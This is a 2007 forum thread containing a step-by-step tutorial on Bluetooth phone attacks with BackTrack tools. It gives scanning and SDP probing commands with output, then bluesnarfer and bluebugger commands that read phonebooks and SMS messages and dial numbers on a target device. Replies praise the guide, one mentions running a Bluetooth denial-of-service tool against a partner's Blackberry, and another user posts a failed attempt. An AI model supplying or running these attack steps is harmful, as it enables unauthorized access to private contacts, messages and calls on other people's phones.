|
|||||||
| Tutorials & Guides Contributions welcome! Please check the rules & guidelines for posting |
 |
|
|
LinkBack | Thread Tools | Display Modes |
09-15-2007, 04:44 AM
|
||||
|
||||
Bluesnarfer & Bluebugger Guide With Backtrack
Hey Guys
Just thought I'd post a little on Bluetooth Hacking because I can see thereis a lot of questions and not alot of answers  So here's how I hacked my samsung d600.First I poped to my local supermarket and picked myself up a bluetooth dongle for 6.99!!!! Because my shitieToshiba Satellite P100 doesn't have bluetooth  Ok first lets configure BT................. Type : bt ~ # mkdir -p /dev/bluetooth/rfcomm mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0 Thats Bluesnarfer done, now for bluebugger............. Type: bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0 Ok now we can fire up are Bluetooth adaptor, so type: bt ~ # hciconfig hci0 up Now are bluetooth adaptor should be ready, check by typing : bt ~ # hciconfig hci0 and you should see somthing like this: hci0: Type: USB BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10 UP RUNNING RX bytes:85 acl:0 sco:0 events:9 errors:0 TX bytes:33 acl:0 sco:0 commands:9 errors:0 Ok now we are ready to scan so type: bt ~ # hcitool scan hci0 And you should see all the devices in the area. You can also use btscanner and btscanner has a bruteforce scanner for discovering hidden devices. Now note the name and MAC of the target and let's move on. First thing lets try to ping are target. Type: l2ping <target MAC> If you dont get a ping GOOD LUCK  Next we need to find out a little about the device we want to hack so lets fire up blueprint. And type: sdptools browse --tree --l2cap <target MAC> And you should get somthing like this: Code:
Browsing 00:16:DB:A1:B6:B9 ...
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10000
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID128 : 0xdb1d8f12-95f3-402c-9b97-bc504c9a-55c4
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Data Sequence
UUID16 : 0x0003 - RFCOMM
Channel/Port (Integer) : 0x1
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x6 - LanguageBaseAttributeIDList
Data Sequence
Code ISO639 (Integer) : 0x656e
Encoding (Integer) : 0x6a
Base Offset (Integer) : 0x100
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID128 : 0x1cdb1d8f-1295-f340-2c9b-97bc504c-9a55
Version (Integer) : 0x100
Attribute Identifier : 0x100
Data : 57 42 54 45 58 54 00 00
Attribute Identifier : 0x8003
Integer : 0x1
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10001
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID16 : 0x1101 - SerialPort
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Data Sequence
UUID16 : 0x0003 - RFCOMM
Channel/Port (Integer) : 0x2
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x1101 - SerialPort
Version (Integer) : 0x100
Attribute Identifier : 0x100
Data : 53 65 72 69 61 6c 20 50 6f 72 74 00 00
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10002
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID16 : 0x1103 - DialupNetworking (DUN)
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Data Sequence
UUID16 : 0x0003 - RFCOMM
Channel/Port (Integer) : 0x3
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x1103 - DialupNetworking (DUN)
Version (Integer) : 0x100
Attribute Identifier : 0x100
Data : 44 69 61 6c 2d 75 70 20 4e 65 74 77 6f 72 6b 69 6e 67 00 00
Attribute Identifier : 0x305
Integer : 0x0
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10003
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID16 : 0x1112 - HeadsetAudioGateway
UUID16 : 0x1203 - GenericAudio
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Data Sequence
UUID16 : 0x0003 - RFCOMM
Channel/Port (Integer) : 0x4
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x1108 - Headset
Version (Integer) : 0x100
Attribute Identifier : 0x100
Data : 56 6f 69 63 65 20 47 57 00 00
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10004
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID16 : 0x111f - HandsfreeAudioGateway
UUID16 : 0x1203 - GenericAudio
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Data Sequence
UUID16 : 0x0003 - RFCOMM
Channel/Port (Integer) : 0x5
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x111e - Handsfree
Version (Integer) : 0x101
Attribute Identifier : 0x100
Data : 56 6f 69 63 65 20 47 57 00 00
Attribute Identifier : 0x301
Integer : 0x1
Attribute Identifier : 0x311
Integer : 0x1
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10005
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID16 : 0x110a - AudioSource
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Channel/Port (Integer) : 0x19
Data Sequence
UUID16 : 0x0019 - AVDTP
Channel/Port (Integer) : 0x100
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x110d - AdvancedAudio
Version (Integer) : 0x100
Attribute Identifier : 0x100
Data : 41 64 76 61 6e 63 65 64 20 61 75 64 69 6f 20 73 6f 75 72 63 65 00 00
Attribute Identifier : 0x311
Integer : 0x1
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10006
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID16 : 0x110c - RemoteControlTarget
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Channel/Port (Integer) : 0x17
Data Sequence
UUID16 : 0x0017 - AVCTP
Channel/Port (Integer) : 0x100
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x110e - RemoteControl
Version (Integer) : 0x100
Attribute Identifier : 0x311
Integer : 0x100
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10007
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID16 : 0x1106 - OBEXFileTransfer
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Data Sequence
UUID16 : 0x0003 - RFCOMM
Channel/Port (Integer) : 0x6
Data Sequence
UUID16 : 0x0008 - OBEX
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x1106 - OBEXFileTransfer
Version (Integer) : 0x100
Attribute Identifier : 0x100
Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00 00
Attribute Identifier : 0x0 - ServiceRecordHandle
Integer : 0x10008
Attribute Identifier : 0x1 - ServiceClassIDList
Data Sequence
UUID16 : 0x1105 - OBEXObjectPush
Attribute Identifier : 0x4 - ProtocolDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x0100 - L2CAP
Data Sequence
UUID16 : 0x0003 - RFCOMM
Channel/Port (Integer) : 0x7
Data Sequence
UUID16 : 0x0008 - OBEX
Attribute Identifier : 0x5 - BrowseGroupList
Data Sequence
UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
Data Sequence
Data Sequence
UUID16 : 0x1105 - OBEXObjectPush
Version (Integer) : 0x100
Attribute Identifier : 0x100
Data : 4f 62 6a 65 63 74 20 50 75 73 68 00 00
Attribute Identifier : 0x303
Data Sequence
Integer : 0x1
Integer : 0x3
Integer : 0x5
Integer : 0xff
Anyway after playing abit I found that my D600 uses channel 7 for phonebook lookup etc. I think every make and model is diffrent so you might have to try a few until you get the right one. Like I said im only just getting to grips with linux So if anybodu knows anymore I'd love to read about it.End Part 1
__________________
yada yada
|
|
09-15-2007, 04:47 AM
|
||||
|
||||
|
Part 2
Ok lets get to it ...... Start a shell and lets take a look at bluesnarfer's options so type: bt ~ # bluesnarfer And you should get : Code:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD : valid AT+CMD (GSM EXTENSION)
TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more
-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel
-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
bluesnarfer [options] -C 7 -b <taget MAC> for eg: bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55 And the hack should start ........ Now bluebugger Type: Bluebugger -h And you should get : Code:
bluebugger 0.1 (cant post urls :D)
-----------------------------------------
Usage: bluebugger [OPTIONS] -a <addr> [MODE]
-a <addr> = Bluetooth address of target
Options:
--------
-m <name> = Name to use when connecting (default: '')
-d <device> = Device to use (default: '/dev/rfcomm')
-c <channel> = Channelto use (default: 17)
-n = No device name lookup
-t <timeout> = Timeout in seconds for name lookup (default: 5)
-o <file> = Write output to <file>
Mode:
-----
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial <num> = Dial number
ATCMD = Custom Command (e.g. '+GMI')
Note: Modes can be combined, e.g. 'info phonebook +GMI'
bluebugger [OPTIONS] -c 7 -a <target MAC> [MODE] for eg: bluebugger -m Dr_GrEeN -c 7 -a 00:11:22:33:44:55 dial 0845GAYPORN And again you should see some results. The only downside to hacking into my D600 is that you still have to allow it on the phone so its not exactly HACKING the D600 but its a good training session. And now you can go forth and play. Hope you lot can understand my bad spelling ETC and have fun PS : Can sombody swap these posts around? Sorry my fault  and oh yea RFCOMM Connection refused error is normally wrong channel. If after using bluebugger you get operation already in progress error type:hciconfig hci0 down hciconfig hci0 reset hciconfig hci0 up And all should be well.
__________________
yada yada
Last edited by Dr_GrEeN; 09-15-2007 at 04:58 AM.
|
|
09-15-2007, 04:59 AM
|
||||
|
||||
|
Dr_GrEen,
Bravo!!! EXCELLENT TUTORIAL, AND WELCOME TO THE FORUMS! P.S. You know way 2 much about hacking Bluetooth to be a no0bie Moving to tutorial Section. Keep up the Great work!
__________________
--=Xploitz=-- ®
|
|
09-15-2007, 05:13 AM
|
||||
|
||||
|
yep excellent work ..... i wish more new members contribute in such fruitful manner....
welcome and don't hesitate to ask if you got pb on anything...... BTW.... you may open an account on our wiki and add this tuto to our howto section.... could be really cool THX
__________________
|
|
09-15-2007, 08:38 AM
|
||||
|
||||
|
Awesome tut man... was going to do a similar writeup, but time hasn't been my friend as of late
 Another fun tool I like to use to let my old lady know her time is up playing games on her Blackberry (after hours on end) is a BT DoS prog in the tbear suite tanya. 
__________________
dd if=/dev/swc666 of=/dev/wyze
|
|
10-27-2007, 06:51 AM
|
||||
|
||||
|
ok so this is what i did and got.... i've been working with this for awhile now, and i HAVE searched everything, that's how i found this thread and other useful tools
*with editing bluebugger -c 8 -a 00:19:A1:F6:00:75 dial 1434560092 bluebugger 0.1 ( MaJoMu | ----------------------------------------- Target Device: '00:19:A1:F6:00:75' Target Name: 'LG' tcgetattr failed: Input/output error bt_rfcomm_config() failed channel 8 is my bt modem, and i can connect to it BUT when it establishes a connection my phone asks for a passkey, and i enter a random character, then it says connection failed. im guessing there's a way to create a passkey between the phone and my computer through bt but i dont know how and thats why i'm asking this way too long question. guidance would be great. thanks
__________________
Become the change you seek in the world. - Gandhi The important thing is not to stop questioning. - Albert Einstein Don't judge the unknown - Grindordie
|
|
10-29-2007, 03:06 AM
|
|||
|
|||
|
I've only used RFComm to do simple tasks and only with my cellular phone. So I can't really offer any advice on how to use that prog. But I do know that most of the time, except for in cellular phone pairing, there is a default passkey. A couple of different BT devices I own use 0000. Try that.
|
|
10-29-2007, 09:54 PM
|
||||
|
||||
|
right, but i was using bluebugger so unless i have to do something with rfcomm first then why would that failure message come up.
my understanding is that they are different programs and have nothing to do with each other
|
|
10-30-2007, 06:06 AM
|
||||
|
||||
|
deal,
i believe i did this command when i first found my phone using btscanner, then l2ping like you said RESULTS.....wait. i didnt boot with my bluetooth. ok i'll re do this
|
|
| Bookmarks |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
| Display Modes | |
Linear Mode
|
|
All times are GMT. The time now is 12:56 AM.
